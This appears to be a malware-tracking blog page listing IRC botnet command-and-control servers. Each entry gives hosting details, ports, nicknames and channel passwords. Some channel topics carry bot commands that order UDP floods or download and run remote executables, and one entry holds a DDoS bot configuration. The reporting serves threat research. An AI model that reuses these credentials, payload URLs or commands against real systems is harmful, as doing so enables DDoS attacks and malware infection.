Now talking in #pontianakcrewTopic On: [ #pontianakcrew ] [Join #Dor Untuk DDOS | Join #scan Buat Scanner]Topic By: [ Guardi4n ] Now talking in #dorTopic On: [ #dor ] [ .user crack .udpflood Ip 100 100 ]Topic By: [ Guardi4n ] <? /* * * #ReloaD-X@corp. 2010 * REcoding by: bogel * recky@doctor.com * *Read more...
64.120.239.219(ngrBot hosted in United States Scranton Network Operations Center Inc.)
C&C Server: 64.120.239.219:1887 Server Password: Username: fbidqck Nickname: n{DE|XPa}fbidqck Channel: #pool (Password: leonis) Channeltopic: :~pu hxxp://www.sendspace.com/pro/dl/3qtgh8 da611193656522f073e0e64c8a65969a -r Downloads this file wich is another ngrbotnet:hxxp://69.31.136.33/dlpro/cee0ddc1c1f7eb6a248759eaf0f4cc45/50d9e2b9/3qtgh8/bonbin.exe sample was found by our turkish kebap friend aLiSs hosting infos: http://whois.domaintools.com/64.120.239.219
www.btcminers.biz(Bit Coin Miner hosted in Russian Federation Saint Petersburg Selectel Ltd.)
Resolved : [www.btcminers.biz] To [31.186.102.189] Resolved : [www.btcminers.biz] To [31.186.102.182] http://www.btcminers.biz:789/ -u m2n3r_A -p refghvytre | POST / HTTP/1.1. | .Authorization: | Basic bTJuM3JfQT A | pyZWZnaHZ5dHJl.. | Content-Length: | 43..User-Agent: | Ufasoft bitcoin- | miner/0.20 (Wind | ows NT XP 5.1.26 | 00 Service Pack | 2) ..Host: local | host:789..Cache- | Control: no-cachRead more...
64.56.64.29(ngr botnet hosted in United States Los Angeles Perfect International In)
server: 64.56.64.29:1887 server: 174.37.172.71:1887server: 184.172.60.181:1887server: 5.153.6.203 TCP:1887Server Password:Username: hxfyijcNickname: n{DE|XPa}hxfyijcChannel: #pool (Password: leonis) Cannel:#r3Channeltopic: :~pu hxxp://hotfile.com/dl/184384511/5b0f4b2/omaigato.exe 765cce9dee5448f58d9e798d91dbf809 ~s -o ~s find more infos about the owner and domains searching for 1887 in this blog downloaded samples: hxxp://199.7.177.244/dl/184384734/6e6cd1d/all.exe==>downloads these links:hxxp://80.86.83.93/index (2musicaonline.com)hxxp://80.86.83.93/Emo-Screamo/ (2musicaonline.com) hxxp://hotfile.com/dl/184299133/b91a140/8346g527rg239gth34t24t.html thanks to aLiSs the turkish kebap for submiting samples hosting infos: http://whois.domaintools.com/64.56.64.29
Master Poko Perlbot vS PiF(linux bots hosted in France Paris Gandi Sas)
var $config = array("server"=>"92.243.21.133", "port"=>"6667", "pass"=>"", "prefix"=>"soldiers", "maxrand"=>"5", "chan"=>"#ddos2", "chan2"=>"#ddos2", "key"=>"ddos", "modes"=>"+p", "password"=>"dor", "trigger"=>".", "hostauth"=>"*" Local users: Current Local Users: 188 Max: 190 Global users:Current Global Users: 188 Max: 190 around 130 linux bots in #unix Master Poko Perlbot vS PiF: #!/usr/bin/perl # # Master Poko Perlbot vS PiF # my @mast3rs = ("Norman","Norman-"); myRead more...
afkm.in(irc bot spreading through skype hosted in Germany Karlsruhe 1&1 Internet Ag)
This botnet belongs to our lame friend snk(he uses aspergillus mod) It was reported by I Post Your Info here Domain Names used from snk: w4hw5wg3488h.net this one now is not active Resolved : [afkm.in] To [82.165.140.66] active domain name used to control bots hxxp://213.165.83.232/b.exe (www.dgp-vision.de) bot exe here The bot downloads 2 exe filesRead more...
boat.trixi-diablolik.com(irc botnet hosted in United States Baltimore Gandi Us Inc.)
This server is owned by serbian skid Root Map: irc.MiloDjukanovic.net (9) Numeric ID: i dont have the executable to find channels so feel free to post them here if u find them server:boat.trixi-diablolik.com port:6667 PASS 0 NICK [A|W_XP|x32|1]gjywth USER 14628 8 * :41909 Local users: Current Local Users: 9 Max: 1017Global users: Current Global Users:Read more...
94mb samples for analysis purposes
This package have alot of banking trojans,worms etc have fun analysing them Source
tv.zabetwo.com(irc botnet hosted in China Hefei Chinanet Anhui Province Network)
Resolved : [tv.zabetwo.com] To [60.172.229.56] server: tv.zabetwo.com port:3324 PASS eee NICK lbaauf Channel #ng pass ng00 channel #us other channels:#!,#Ma,#i hosting infos: http://whois.domaintools.com/60.172.229.56
irc.infctd.biz(irc botnet hosted in Sweden Stockholm Portlane Networks Ab)
Resolved : [irc.infctd.biz] To [46.246.93.77] server: irc.infctd.biz port:6667 NICK [skank]5926101 USER nxmnrwy 0 0 :[skank]5926101 USERHOST [skank]5926101 MODE [skank]5926101 -x JOIN #deneme101010 Now talking in #deneme101010Topic On: [ #deneme101010 ] [ !dl http://mgtrading.org/ddos.exe c:/ddos.exe 1 ]Topic By: [ voLwy ] hosting infos: http://whois.domaintools.com/46.246.93.77